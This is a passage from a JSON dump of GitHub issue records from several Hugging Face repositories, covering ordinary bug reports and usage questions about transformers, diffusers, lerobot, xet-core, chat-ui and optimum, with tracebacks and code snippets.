    "body": "I use qwen2.5-7b-Instruct to run grpo, and open yarn, to accommodate a longer window(greater than 32768). But fowllowing error exists:\n\n                                                                                                                                                                                      \n  0%|          | 0/187 [00:00                                                                                                                                                                      \n[rank2]:     main(script_args, training_args, model_args)                                                                                                                                                                                                                       \n[rank2]:   File \"/cto_studio/huyongquan/python_project/open-r1/src/open_r1/grpo.py\", line 309, in main                                                                                                                                                                          \n[rank2]:     train_result = trainer.train(resume_from_checkpoint=checkpoint)                                                                                                                                                                                                    ",
    "url": "https://github.com/huggingface/open-r1/issues/645",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-16T03:28:50Z",
    "updated_at": "2025-06-12T08:45:15Z",
    "user": "huyongquan"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38165,
    "title": "Gemma 3 Pipeline does not accept dictionary with no images",
    "body": "### System Info\n\nSystem info not really relevant as the bug is root caused in my description below.\n\n- `transformers` version: 4.51.3\n- Platform: Windows-10-10.0.26100-SP0\n- Python version: 3.11.9\n- Huggingface_hub version: 0.31.2\n- Safetensors version: 0.5.3\n- Accelerate version: 1.7.0\n- Accelerate config:    not found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.4.0+cu121 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script:Yes\n- GPU type: NVIDIA GeForce RTX 3090\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nThis issue can be created using the following snippet copied from Gemma 3 docs and up until transformer 4.51.3.\n```\nfrom transformers import pipeline\nimport torch\n\npipe = pipeline(\n    \"image-text-to-text\",\n    model=\"google/gemma-3-12b-it\",\n    device=\"cuda\", # Or \"cpu\" if you don't have a compatible GPU\n    torch_dtype=torch.bfloat16 # Or torch.float16 or torch.float32 based on your hardware/needs\n)\n\nmessages = [\n    {\n        \"role\": \"system\",\n        \"content\": [{\"type\": \"text\", \"text\": \"You are a helpful assistant.\"}]\n    },\n    {\n        \"role\": \"user\",\n        \"content\": [\n            # Removed the image link from the example\n            {\"type\": \"text\", \"text\": \"What is the capital of France?\"} # Keep only the text part\n        ]\n    }\n]\n\noutput = pipe(text=messages, max_new_tokens=200)\nprint(output[0][\"generated_text\"][-1][\"content\"])\n```\n\nwhich will result in the error:\n\n```\nTraceback (most recent call last):\n  File \"D:\\experiments\\personal\\gemma_editor\\gemma_editor.py\", line 78, in \n    run_gemma(SENTENCES)\n  File \"D:\\experiments\\personal\\gemma_editor\\gemma_editor.py\", line 41, in run_gemma\n    output = pipe(text=messages)\n             ^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\pipelines\\image_text_to_text.py\", line 311, in __call__\n    return super().__call__(Chat(text, images), **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\pipelines\\base.py\", line 1379, in __call__\n    return self.run_single(inputs, preprocess_params, forward_params, postprocess_params)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\pipelines\\base.py\", line 1385, in run_single\n    model_inputs = self.preprocess(inputs, **preprocess_params)\n                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\pipelines\\image_text_to_text.py\", line 365, in preprocess\n    model_inputs = self.processor(images=images, text=text, return_tensors=self.framework, **processing_kwargs).to(\n                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File 
\"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\models\\gemma3\\processing_gemma3.py\", line 106, in __call__\n    image_inputs = self.image_processor(batched_images, **output_kwargs[\"images_kwargs\"])\n                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\image_processing_utils.py\", line 42, in __call__\n    return self.preprocess(images, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\utils\\generic.py\", line 866, in wrapper\n    return func(*args, **valid_kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\models\\gemma3\\image_processing_gemma3.py\", line 361, in preprocess\n    if do_rescale and is_scaled_image(images[0]):\n                                      ~~~~~~^^^\nIndexError: list index out of range\n```\n\n### Expected behavior\n\nThe problem here is that within image_text_to_text, the dictionary is made into type: Chat. [By default chat makes images an empty list](https://github.com/huggingface/transformers/blame/v4.51.3/src/transformers/pipelines/image_text_to_text.py#L114). Then this is propagated to [images](https://github.com/huggingface/transformers/blame/v4.51.3/src/transformers/pipelines/image_text_to_text.py#L353C16-L353C39) where it ultimately lands in processing_gemma_3.py where the [if condition only checks if the images are None](https://github.com/huggingface/transformers/blob/v4.51.3/src/transformers/models/gemma3/",
    "url": "https://github.com/huggingface/transformers/issues/38165",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-16T01:34:15Z",
    "updated_at": "2025-06-23T08:03:03Z",
    "comments": 6,
    "user": "sheldonlai"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1114,
    "title": "How to collect data and train the policy from Lerobot totally out of the leader arm only by learning from demonstration using the main arm such as XARM or UR series",
    "body": "",
    "url": "https://github.com/huggingface/lerobot/issues/1114",
    "state": "closed",
    "labels": [
      "question",
      "robots",
      "stale"
    ],
    "created_at": "2025-05-15T15:31:13Z",
    "updated_at": "2025-12-31T02:35:25Z",
    "user": "David-Kingsman"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38147,
    "title": "How to check the number of tokens processed or the load of each expert in the Qwen3 MoE model during inference?",
    "body": "",
    "url": "https://github.com/huggingface/transformers/issues/38147",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-15T09:21:29Z",
    "updated_at": "2025-05-15T13:36:53Z",
    "user": "wumaotegan"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11561,
    "title": "FluxFillPipeline Support load IP Adapter.",
    "body": "### Model/Pipeline/Scheduler description\n\n'FluxFillPipeline' object has no attribute 'load_ip_adapter'\nI really need this,Thanks!\n\n### Open source status\n\n- [ ] The model implementation is available.\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11561",
    "state": "closed",
    "labels": [
      "help wanted",
      "Good second issue"
    ],
    "created_at": "2025-05-15T08:58:42Z",
    "updated_at": "2025-06-17T08:48:28Z",
    "comments": 6,
    "user": "PineREN"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1111,
    "title": "Unrecognized argument policy.path. How to load a pretrained model?",
    "body": "When I run this command:\n```\npython lerobot/scripts/control_robot.py --robot.type so100 --control.type record --control.fps 30 --control.single_task \"Grasp a yellow tape and put it to yellow square.\" --control.repo_id a_cam_1/result --control.tags '[\"tutorial\"]' --control.warmup_time_s 5 --control.episode_time_s 30 --control.reset_time_s 10 --control.m_episodes 1 --control.push_to_hub false --control.policy,path output/checkpoints/last/pretrained_model\n```\n\n\nI got:\n```\nusage: control_robot.py [-h] [--config_path str] [--robot str] [--robot.type {aloha,koch,koch_bimanual,moss,so101,so100,stretch,lekiwi}] [--robot.gripper_open_degree str]\n                        [--robot.max_relative_target str] [--robot.ip str] [--robot.port str] [--robot.video_port str] [--robot.cameras str] [--robot.calibration_dir str]\n                        [--robot.leader_arms str] [--robot.follower_arms str] [--robot.teleop_keys str] [--robot.mock str] [--control str]\n                        [--control.type {calibrate,teleoperate,record,replay,remote_robot}] [--control.arms str] [--control.teleop_time_s str] [--control.single_task str]\n                        [--policy str] [--control.policy.type {act,diffusion,pi0,tdmpc,vqbet,pi0fast}] [--control.policy.replace_final_stride_with_dilation str]\n                        [--control.policy.pre_norm str] [--control.policy.dim_model str] [--control.policy.n_heads str] [--control.policy.dim_feedforward str]\n                        [--control.policy.feedforward_activation str] [--control.policy.n_encoder_layers str] [--control.policy.n_decoder_layers str]\n                        [--control.policy.use_vae str] [--control.policy.n_vae_encoder_layers str] [--control.policy.temporal_ensemble_coeff str]\n                        [--control.policy.kl_weight str] [--control.policy.optimizer_lr_backbone str] [--control.policy.drop_n_last_frames str]\n                        [--control.policy.use_separate_rgb_encoder_per_camera str] [--control.policy.down_dims str] [--control.policy.kernel_size str]\n                        [--control.policy.n_groups str] [--control.policy.diffusion_step_embed_dim str] [--control.policy.use_film_scale_modulation str]\n                        [--control.policy.noise_scheduler_type str] [--control.policy.num_train_timesteps str] [--control.policy.beta_schedule str]\n                        [--control.policy.beta_start str] [--control.policy.beta_end str] [--control.policy.prediction_type str] [--control.policy.clip_sample str]\n                        [--control.policy.clip_sample_range str] [--control.policy.num_inference_steps str] [--control.policy.do_mask_loss_for_padding str]\n                        [--control.policy.scheduler_name str] [--control.policy.num_steps str] [--control.policy.attention_implementation str]\n                        [--control.policy.train_expert_only str] [--control.policy.train_state_proj str] [--control.policy.n_action_repeats str] [--control.policy.horizon str]\n                        [--control.policy.image_encoder_hidden_dim str] [--control.policy.state_encoder_hidden_dim str] [--control.policy.latent_dim str]\n                        [--control.policy.q_ensemble_size str] [--control.policy.mlp_dim str] [--control.policy.discount str] [--control.policy.use_mpc str]\n                        [--control.policy.cem_iterations str] [--control.policy.max_std str] [--control.policy.min_std str] [--control.policy.n_gaussian_samples str]\n                        [--control.policy.n_pi_samples 
str] [--control.policy.uncertainty_regularizer_coeff str] [--control.policy.n_elites str]\n                        [--control.policy.elite_weighting_temperature str] [--control.policy.gaussian_mean_momentum str] [--control.policy.max_random_shift_ratio str]\n                        [--control.policy.reward_coeff str] [--control.policy.expectile_weight str] [--control.policy.value_coeff str] [--control.policy.consistency_coeff str]\n                        [--control.policy.advantage_scaling str] [--control.policy.pi_coeff str] [--control.policy.temporal_decay_coeff str]\n                        [--control.policy.target_model_momentum str] [--control.policy.n_action_pred_token str] [--control.policy.action_chunk_size str]\n                        [--control.policy.vision_backbone str] [--control.policy.crop_shape str] [--control.policy.crop_is_random str]\n                        [--control.policy.pretrained_backbone_weights str] [--control.policy.use_group_norm str] [--control.policy.spatial_softmax_num_keypoints str]\n                        [--control.policy.n_vqvae_training_steps str] [--control.policy.vqvae_n_embed str] [--control.policy.vqvae_embedding_dim str]\n                        [--control.policy.vqvae_enc_hidden_dim str] [--control.policy.gpt_block_size str] [--control.policy.gpt_input_dim str]\n                        [--control.policy.gpt_output_dim str] [--control.policy.gpt_n_layer str] [--control.policy.gpt_n_head str] [--control.policy.gpt_hidden_dim str]\n ",
    "url": "https://github.com/huggingface/lerobot/issues/1111",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-15T03:13:27Z",
    "updated_at": "2025-06-24T06:20:08Z",
    "user": "milong26"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11555,
    "title": "`device_map=\"auto\"` supported for diffusers pipelines?",
    "body": "### Describe the bug\n\nHey dear diffusers team,\n\nfor `DiffusionPipline`, as I understand (hopefully correctly) from [this part of the documentation](https://huggingface.co/docs/diffusers/v0.33.1/en/api/pipelines/overview#diffusers.DiffusionPipeline.from_pretrained.device_map), it should be possible to specify `device_map=\"auto\"` when loading a pipeline with `from_pretrained` but this results in a value error saying that this is not supported.\n\nHowever, the documentation on [device placement](https://huggingface.co/docs/diffusers/en/tutorials/inference_with_big_models#device-placement) currently states that only the \"balanced\" strategy is supported.\n\nIs this possibly similar to #11432 and should be removed from the docstrings / documentation? Happy to help on this with a PR if it turns out to be a mistake in the documentation.\n\nThanks a lot for your hard work!\n\n\n\n### Reproduction\n\n```python\nfrom diffusers import DiffusionPipeline\npipeline = DiffusionPipeline.from_pretrained(\"stable-diffusion-v1-5/stable-diffusion-v1-5\", device_map=\"auto\")\n```\n\nor \n\n```python\nfrom diffusers import StableDiffusionPipeline\npipe = StableDiffusionPipeline.from_pretrained(\"stable-diffusion-v1-5/stable-diffusion-v1-5\", device_map=\"auto\")\n```\n\n### Logs\n\n```shell\n---------------------------------------------------------------------------\nNotImplementedError                       Traceback (most recent call last)\nCell In[12], line 3\n      1 from diffusers import StableDiffusionPipeline\n----> 3 pipe = StableDiffusionPipeline.from_pretrained(\"stable-diffusion-v1-5/stable-diffusion-v1-5\", device_map=\"auto\")\n\nFile ~/miniconda3/envs/pruna/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py:114, in validate_hf_hub_args.._inner_fn(*args, **kwargs)\n    111 if check_use_auth_token:\n    112     kwargs = smoothly_deprecate_use_auth_token(fn_name=fn.__name__, has_token=has_token, kwargs=kwargs)\n--> 114 return fn(*args, **kwargs)\n\nFile ~/miniconda3/envs/pruna/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py:745, in DiffusionPipeline.from_pretrained(cls, pretrained_model_name_or_path, **kwargs)\n    742     raise ValueError(\"`device_map` must be a string.\")\n    744 if device_map is not None and device_map not in SUPPORTED_DEVICE_MAP:\n--> 745     raise NotImplementedError(\n    746         f\"{device_map} not supported. Supported strategies are: {', '.join(SUPPORTED_DEVICE_MAP)}\"\n    747     )\n    749 if device_map is not None and device_map in SUPPORTED_DEVICE_MAP:\n    750     if is_accelerate_version(\"<\", \"0.28.0\"):\n\nNotImplementedError: auto not supported. Supported strategies are: balanced\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.33.1\n- Platform: Linux-5.15.0-139-generic-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.10.16\n- PyTorch version (GPU?): 2.7.0+cu126 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.30.2\n- Transformers version: 4.51.3\n- Accelerate version: 1.6.0\n- PEFT version: 0.15.2\n- Bitsandbytes version: 0.45.5\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA H100 PCIe, 81559 MiB\nNVIDIA H100 PCIe, 81559 MiB\n- Using GPU in script?: yes\n- Using distributed or parallel set-up in script?: yes\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11555",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-14T16:49:32Z",
    "updated_at": "2025-05-19T09:44:29Z",
    "comments": 4,
    "user": "johannaSommer"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1107,
    "title": "Does Pi0 use PaliGemma VLM pretrained model weights?",
    "body": "I attempted to finetune the Pi0 model, but noticed that it does not download the pretrained weights of Paligemma from Hugging Face. Specifically, I found that Pi0 initializes the VLM with:\n\n```python\nself.paligemma = PaliGemmaForConditionalGeneration(config=config.paligemma_config)\n```\n\ninstead of using:\n\n```python\nAutoModel.from_pretrained(\"google/paligemma-3b-pt-224\")\n```\n\nThis seems to result in the model not loading the pretrained weights.\n\nCould you please confirm whether this is the intended behavior? Should Pi0 load Paligemma\u2019s pretrained weights from Hugging Face, or is there a reason it initializes the model from scratch?\n\nThank you!",
    "url": "https://github.com/huggingface/lerobot/issues/1107",
    "state": "closed",
    "labels": [
      "bug",
      "question",
      "policies"
    ],
    "created_at": "2025-05-14T06:47:15Z",
    "updated_at": "2025-10-08T08:44:03Z",
    "user": "lxysl"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1106,
    "title": "How to convert image mode to video mode lerobot dataset?",
    "body": "",
    "url": "https://github.com/huggingface/lerobot/issues/1106",
    "state": "open",
    "labels": [
      "question",
      "dataset"
    ],
    "created_at": "2025-05-14T03:54:42Z",
    "updated_at": "2025-08-08T16:42:33Z",
    "user": "hairuoliu1"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1316,
    "title": "May I ask how to set the HF_TOKEN on the browser side?",
    "body": "### Question\n\nMay I ask how to set the HF_TOKEN on the browser side?\n\n![Image](https://github.com/user-attachments/assets/944af6e1-a3b7-429b-81a6-6d205925915e)\n\nThe following is my code:\n```\nconst model = await AutoModel.from_pretrained(\"briaai/RMBG-2.0\", {\n  config: {\n    model_type: \"custom\", \n  },\n  headers: {\n    'Authorization': `Bearer hf_xxxxxxxxxxxxxxx`\n  }\n});\n```",
    "url": "https://github.com/huggingface/transformers.js/issues/1316",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-14T01:43:02Z",
    "updated_at": "2025-05-27T21:53:45Z",
    "user": "dengbupapapa"
  },
  {
    "repo": "huggingface/xet-core",
    "number": 321,
    "title": "How to resume DL of partial existing file using xet + huggingface-cli download if not previously downloaded using HF tools / cache?",
    "body": "How to resume DL of partial existing file using xet + huggingface-cli download if not previously downloaded using HF tools / cache?\n\nI guess there may be a way in the scenario I had but by my mistake apparently I chose some incorrect usage and caused the deletion of the 95% complete partial local file instead of resuming / recovering its download via XET.\n\ne.g. I tried with a fresh tool install and a process something like:\n\n% pip install -U \"huggingface_hub[hf_xet]\"\n\n% pwd\n/whatever/some_tmpdir\n\n% ls -lh somefile\n35G somefile\n// Partial file exists and is 95% complete but short / truncated by failed copy previously.\n\n% huggingface-cli download --local-dir . some_repo_id some_dir/somefile\n\nThe end result was apparently the deletion of the pre-existing 95% complete 'somefile' from the current directory and the initiation of new download using xet protocol from the xet enabled some_repo_id.\n\nBased on huggingface-cli download --help and the articles about xet I had expected it to realize the pre-existing current directory's \"somefile\" with an identical name/target directory as the file being requested for download was a partial relevant file and it should start to recover / complete the download by missing chunk completion.  That despite the fact that there was no cache directory or git LFS structure around the current working directory, it just contained the isolated partial file only.\n\n\nhuggingface-cli download --help \nusage: huggingface-cli  [] download [-h] [--repo-type {model,dataset,space}] [--revision REVISION] [--include [INCLUDE ...]] [--exclude [EXCLUDE ...]] [--cache-dir CACHE_DIR]\n                                                   [--local-dir LOCAL_DIR] [--local-dir-use-symlinks {auto,True,False}] [--force-download] [--resume-download] [--token TOKEN] [--quiet]\n                                                   [--max-workers MAX_WORKERS]\n                                                   repo_id [filenames ...]\n\npositional arguments:\n  repo_id               ID of the repo to download from (e.g. `username/repo-name`).\n  filenames             Files to download (e.g. `config.json`, `data/metadata.jsonl`).\n\noptions:\n...\n  --local-dir LOCAL_DIR\n                        If set, the downloaded file will be placed under this directory. Check out https://huggingface.co/docs/huggingface_hub/guides/download#download-files-to-local-folder for more\n                        details.\n...\n  --resume-download     Deprecated and ignored. Downloading a file to local dir always attempts to resume previously interrupted downloads (unless hf-transfer is enabled).\n...\n\nhuggingface-cli download --local-dir . some_repo_id some_dir/somefile\nDownloading 'somefile' to '.cache/huggingface/download/whatever.incomplete'\nXet Storage is enabled for this repo. Downloading file from Xet Storage..\n...\n\n\nIf there's a different way to accomplish this partial file recovery result (or even if there's a corrupted / patched / whatever file per. 
xet's chunk-filling capabilities), then perhaps clarifying / expanding the usage documentation to cover this kind of common scenario could help?\n\nThe desired result would be something like\n\nrsync --verbose --archive server:/some_repo_id/somedir/somefile somefile\n\nwhich would use the rolling-hash, chunk-based rsync algorithm / protocol to complete the retrieval of somefile in the current directory regardless of other context.\n\n\n\nAlso I wonder if it'd be interesting to have an rsync-to-xet 'bridge', so anyone could use a normal rsync client to pull Xet files from HF repos: if HF doesn't want to support rsync itself wholesale, it has the conceptually aligned Xet back end that could (I suppose) be \"mapped\" to rsync's chunk-based protocol by a thin protocol adapter?\n\nLots of sites, e.g. Linux distribution mirrors, support rsync as an HTTP/HTTPS alternative, so it presumably has significant market share for people doing IT / devops / mlops downloads.
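\n\nFor comparison, a minimal sketch of the resume path that is supported today (repo and file names are the placeholder names from above; standard `hf_hub_download` API):\n\n```python\nfrom huggingface_hub import hf_hub_download\n\n# Re-running the same download into the same local dir resumes any\n# *.incomplete file under .cache/huggingface/download; a partial file\n# placed there by other tools is not recognized as resumable.\npath = hf_hub_download(\n    repo_id=\"some_repo_id\",\n    filename=\"some_dir/somefile\",\n    local_dir=\".\",\n)\n```",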
    "url": "https://github.com/huggingface/xet-core/issues/321",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-13T22:16:02Z",
    "updated_at": "2025-05-16T17:48:45Z",
    "user": "ghchris2021"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1819,
    "title": "Correct syntax of .env: what are those backticks for multiline strings?",
    "body": "I have read the suggestion of checking discussions but I was unable to find an answer so something very basic looks like it is missing here.\n\nIn the documentation there are many examples suggesting of putting long values in env var surrounded by backticks.\n\nHowever when I do this I get errors like:\n\nJSON5: invalid character '`' at 1:1\n\nI have checked around and I have been unable to find anywhere references to .env using backticks for multiline strings, and the parser is refusing this.\n\nTHis is happening with a git clone of main but also using tagged versions.\n\nSo how do you possibile use this apparently non standard syntax and how is it possible no one else but me is having this issue? \n\n",
    "url": "https://github.com/huggingface/chat-ui/issues/1819",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2025-05-13T12:21:43Z",
    "updated_at": "2025-05-23T09:37:09Z",
    "comments": 1,
    "user": "sciabarracom"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2262,
    "title": "New Release to Support `transformers>=4.51.0`?",
    "body": "### Feature request\n\nThe latest release (`1.24.0`) is 4 months old. There has been around 38 commits since the last release. Will there be a new release soon?\n\n### Motivation\n\nThere is a medium CVE related to `transformers==4.48.1` that is the latest compatible version.\nGHSA-fpwr-67px-3qhx\n\nI am also blocked from upgrading `vllm==0.8.5` within my system as it requires `transformers>=4.51.0`. `transformers==4.48.1` is compatible with up to `vllm==0.8.2` only where there are critical and high CVEs.\nGHSA-hj4w-hm2g-p6w5\nGHSA-9f8f-2vmf-885j\n\nIt looks like the current dependencies in the `main` branch will mitigate these issues completely. Is there any blocker to creating a new release from current state?\n\n### Your contribution\n\nDon't think I will be granted permissions to create releases in this project.",
    "url": "https://github.com/huggingface/optimum/issues/2262",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-13T07:46:15Z",
    "updated_at": "2025-05-13T22:27:08Z",
    "comments": 2,
    "user": "yxtay"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1101,
    "title": "ValueError: No integer found between bounds [low_factor=np.float32(-0.001953125), upp_factor=np.float32(-0.001953125)]",
    "body": "### System Info\n\n```Shell\n2025,ubantu,python3.10. when doing teleoperation\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\npython lerobot/scripts/control_robot.py   --robot.type=so100   --robot.cameras='{}'   --control.type=teleoperate \n\n\n### Expected behavior\n\nHow to deal with it.",
    "url": "https://github.com/huggingface/lerobot/issues/1101",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-13T05:06:35Z",
    "updated_at": "2025-06-19T14:25:08Z",
    "user": "qingx-cyber"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11542,
    "title": "What's the difference between 'example/train_text_to_image_lora.py' and 'example/research_projects/lora/train_text_to_image_lora.py' ?",
    "body": " I want to use the \"--train_text_encoder\" argument, but it only exists in the latter script.",
    "url": "https://github.com/huggingface/diffusers/issues/11542",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-13T01:41:19Z",
    "updated_at": "2025-06-10T20:35:10Z",
    "comments": 2,
    "user": "night-train-zhx"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1097,
    "title": "UnboundLocalError: local variable 'action' referenced before assignment",
    "body": "May I ask where the problem lies? It occurred during the evaluation of the strategy and I have been searching for a long time without finding a solution\n\n(lerobot) wzx@wzx:~/lerobot$ python lerobot/scripts/control_robot.py   \\\n> --robot.type=so101   \\\n> --control.type=record   \\\n> --control.fps=30   \\\n> --control.single_task=\"Grasp a lego block and put it in the bin.\" \\\n> --control.repo_id=${HF_USER}/eval_act_so101_test   \\\n> --control.tags='[\"tutorial\"]'   \\\n> --control.warmup_time_s=5   \\\n> --control.episode_time_s=30   \\\n> --control.reset_time_s=30   \\\n> --control.num_episodes=10  \\\n> --control.display_data=true \\\n> --control.push_to_hub=true   \\\n> --control.policy.path=outputs/train/act_so101_test/checkpoints/last/pretrained_model \nINFO 2025-05-12 22:54:05 ol_robot.py:408 {'control': {'display_data': True,\n             'episode_time_s': 30,\n             'fps': 30,\n             'num_episodes': 10,\n             'num_image_writer_processes': 0,\n             'num_image_writer_threads_per_camera': 4,\n             'play_sounds': True,\n             'policy': {'beta_end': 0.02,\n                        'beta_schedule': 'squaredcos_cap_v2',\n                        'beta_start': 0.0001,\n                        'clip_sample': True,\n                        'clip_sample_range': 1.0,\n                        'crop_is_random': True,\n                        'crop_shape': (84, 84),\n                        'device': 'cuda',\n                        'diffusion_step_embed_dim': 128,\n                        'do_mask_loss_for_padding': False,\n                        'down_dims': (512, 1024, 2048),\n                        'drop_n_last_frames': 7,\n                        'horizon': 16,\n                        'input_features': {'observation.images.laptop': {'shape': (3,\n                                                                                   480,\n                                                                                   640),\n                                                                         'type': },\n                                           'observation.images.phone': {'shape': (3,\n                                                                                  480,\n                                                                                  640),\n                                                                        'type': },\n                                           'observation.state': {'shape': (6,),\n                                                                 'type': }},\n                        'kernel_size': 5,\n                        'n_action_steps': 8,\n                        'n_groups': 8,\n                        'n_obs_steps': 2,\n                        'noise_scheduler_type': 'DDPM',\n                        'normalization_mapping': {'ACTION': ,\n                                                  'STATE': ,\n                                                  'VISUAL': },\n                        'num_inference_steps': None,\n                        'num_train_timesteps': 100,\n                        'optimizer_betas': (0.95, 0.999),\n                        'optimizer_eps': 1e-08,\n                        'optimizer_lr': 0.0001,\n                        'optimizer_weight_decay': 1e-06,\n                        'output_features': {'action': {'shape': (6,),\n                                                       'type': }},\n                        'prediction_type': 'epsilon',\n      
                  'pretrained_backbone_weights': None,\n                        'scheduler_name': 'cosine',\n                        'scheduler_warmup_steps': 500,\n                        'spatial_softmax_num_keypoints': 32,\n                        'use_amp': False,\n                        'use_film_scale_modulation': True,\n                        'use_group_norm': True,\n                        'use_separate_rgb_encoder_per_camera': False,\n                        'vision_backbone': 'resnet18'},\n             'private': False,\n             'push_to_hub': True,\n             'repo_id': 'bursomi/eval_act_so101_test',\n             'reset_time_s': 30,\n             'resume': False,\n             'root': None,\n             'single_task': 'Grasp a lego block and put it in the bin.',\n             'tags': ['tutorial'],\n             'video': True,\n             'warmup_time_s': 5},\n 'robot': {'calibration_dir': '.cache/calibration/so101',\n           'cameras': {'laptop': {'camera_index': 2,\n                                  'channels': 3,\n                                  'color_mode': 'rgb',\n                                  'fps': 30,\n                                  'height': 480,\n                                  'mock': False,\n                                  'rotation': None,\n                ",
    "url": "https://github.com/huggingface/lerobot/issues/1097",
    "state": "closed",
    "labels": [
      "bug",
      "question"
    ],
    "created_at": "2025-05-12T16:06:27Z",
    "updated_at": "2025-06-19T14:08:57Z",
    "user": "incomple42"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1093,
    "title": "List of available task",
    "body": "Thank you for your effort. Can you provide a list of available tasks (not just environments) for better understanding and usage? ",
    "url": "https://github.com/huggingface/lerobot/issues/1093",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-10T06:18:21Z",
    "updated_at": "2025-10-17T12:03:32Z",
    "user": "return-sleep"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38052,
    "title": "`.to` on a `PreTrainedModel` throws a Pyright type check error. What is the correct way to put a model to the device that does not throw type check errors?",
    "body": "### System Info\n\n(venv) nicholas@B367309:tmp(master)$ transformers-cli env\n\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\n\n- `transformers` version: 4.51.1\n- Platform: Linux-5.10.16.3-microsoft-standard-WSL2-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- Huggingface_hub version: 0.30.2\n- Safetensors version: 0.5.3\n- Accelerate version: 1.6.0\n- Accelerate config:    not found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.6.0+cu126 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA RTX 2000 Ada Generation Laptop GPU\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nHere is a small snippet\n\n```python\nfrom transformers.models.auto.modeling_auto import AutoModelForCausalLM\nfrom transformers.models.llama.modeling_llama import LlamaForCausalLM\n\nmodel = AutoModelForCausalLM.from_pretrained(\n    \"deepseek-ai/deepseek-coder-1.3b-instruct\", torch_dtype=torch.float16\n)\nassert isinstance(model, LlamaForCausalLM)\nmodel.to(\"cuda:0\")\n```\n\nThis code runs fine and correctly puts the model to the device, however, `Pyright` throws a 